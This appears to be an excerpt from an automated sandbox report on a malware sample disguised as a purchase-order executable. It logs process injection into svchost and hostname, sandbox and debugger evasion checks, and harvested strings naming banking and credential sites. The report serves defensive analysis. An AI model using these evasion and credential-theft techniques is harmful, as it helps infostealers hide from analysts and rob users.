Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: hostname.pdbGCTL source: svchost.exe, 00000002.00000002.1350941552.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1350978356.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493011892.00000000014FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: hostname.pdb source: svchost.exe, 00000002.00000002.1350941552.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1350978356.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493011892.00000000014FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1042534063.0000000003660000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1043381545.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1351629809.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1255304923.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1351629809.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1257594091.0000000003200000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1349034945.000000000374E000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1353725951.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1042534063.0000000003660000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1043381545.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1351629809.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1255304923.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1351629809.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1257594091.0000000003200000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, HOSTNAME.EXE, 0000000C.00000003.1349034945.000000000374E000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1353725951.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3492564549.000000000352F000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420578574.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1639894308.0000000007A2C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3492564549.000000000352F000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420578574.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1639894308.0000000007A2C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3492017410.0000000000EFF000.00000002.00000001.01000000.00000007.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420355982.0000000000EFF000.00000002.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00320A10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00320A10

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001FC4FE push A3001FBAh; retn 001Fh	0_2_001FC50D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00218945 push ecx; ret	0_2_00218958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416964 push esi; retf	2_2_00416971
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AA65 push FFFFFFF5h; iretd	2_2_0040AA6E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403270 push eax; ret	2_2_00403272
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414A0D pushfd ; iretd	2_2_00414A77
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418AC8 push 0000004Eh; iretd	2_2_00418AE6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418B00 push 0000004Eh; iretd	2_2_00418AE6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004083C6 push esi; iretd	2_2_004083C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041839D push ds; iretd	2_2_004183ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004083AF push esi; iretd	2_2_004083C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EC5F push eax; retf	2_2_0041ECB6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041B469 push cs; iretd	2_2_0041B46A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EC8B push eax; retf	2_2_0041ECB6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417CA7 push ds; iretd	2_2_00417CB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00405D97 push 849D4F26h; retf	2_2_00405DA2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004146DF pushfd ; retf	2_2_0041470D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EEA3 push esp; ret	2_2_0041EEA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_03AD09AD push ecx; mov dword ptr [esp], ecx	12_2_03AD09B6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C81F6 push cs; iretd	12_2_032C81F7
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032B2B24 push 849D4F26h; retf	12_2_032B2B2F
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C4A34 push ds; iretd	12_2_032C4A3D
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C28EC pushfd ; ret	12_2_032C28ED
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032D1259 push ecx; ret	12_2_032D125F
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C512A push ds; iretd	12_2_032C517A
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032B513C push esi; iretd	12_2_032B5151
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032B5153 push esi; iretd	12_2_032B5151
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032B77F2 push FFFFFFF5h; iretd	12_2_032B77FB
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032C36F1 push esi; retf	12_2_032C36FE
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032CF4D0 push ss; retf 6383h	12_2_032CF522

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_001F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_001F48D7
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00275376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00275376

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00213187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00213187

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	API/Special instruction interceptor: Address: D6F504
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122D324
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122D7E4
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122D944
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122D504
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122D544
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122D1E4
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD31230154
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFD3122DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1034961909.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1044265573.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1032520577.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1032402542.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1032136313.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1035047695.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1041132092.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1035589870.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1035109588.0000000000D8C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Window / User API: threadDelayed 969			Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Window / User API: threadDelayed 9003			Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102270

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 4716	Thread sleep count: 969 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 4716	Thread sleep time: -1938000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 4716	Thread sleep count: 9003 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 4716	Thread sleep time: -18006000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe TID: 3760	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe TID: 3760	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe TID: 3760	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe TID: 3760	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe TID: 3760	Thread sleep time: -46500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0025445A
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025C6D1 FindFirstFileW,FindClose,	0_2_0025C6D1
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0025C75C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025EF95
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025F0F2
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0025F3F3
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002537EF
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00253B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00253B12
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0025BCBC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032CCAC0 FindFirstFileW,FindNextFileW,FindClose,	12_2_032CCAC0

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_001F49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001F49A0

Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: U7-5I27.12.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: U7-5I27.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: U7-5I27.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: U7-5I27.12.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: U7-5I27.12.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: HOSTNAME.EXE, 0000000C.00000002.3496807218.00000000084DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413s
Source: U7-5I27.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: U7-5I27.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: U7-5I27.12.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: U7-5I27.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: firefox.exe, 0000000E.00000002.1641293330.00000244879DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: U7-5I27.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: U7-5I27.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: HOSTNAME.EXE, 0000000C.00000002.3492564549.000000000352F000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000002.3493205308.00000000009A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: U7-5I27.12.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: HOSTNAME.EXE, 0000000C.00000002.3496807218.00000000084DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .co.inVMware20,11696501413d
Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: HOSTNAME.EXE, 0000000C.00000002.3496807218.00000000084DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413.
Source: U7-5I27.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: U7-5I27.12.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: U7-5I27.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: U7-5I27.12.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: U7-5I27.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: U7-5I27.12.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: U7-5I27.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: U7-5I27.12.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: U7-5I27.12.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: U7-5I27.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: U7-5I27.12.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: U7-5I27.12.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: U7-5I27.12.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417CB3 LdrLoadDll,

2_2_00417CB3

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00263F09 BlockInput,

0_2_00263F09

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_001F3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_001F3B3A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00225A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_00225A7C

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00320A10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00320A10

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D6E170 mov eax, dword ptr fs:[00000030h]	0_2_00D6E170
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D6F7D0 mov eax, dword ptr fs:[00000030h]	0_2_00D6F7D0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D6F770 mov eax, dword ptr fs:[00000030h]	0_2_00D6F770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
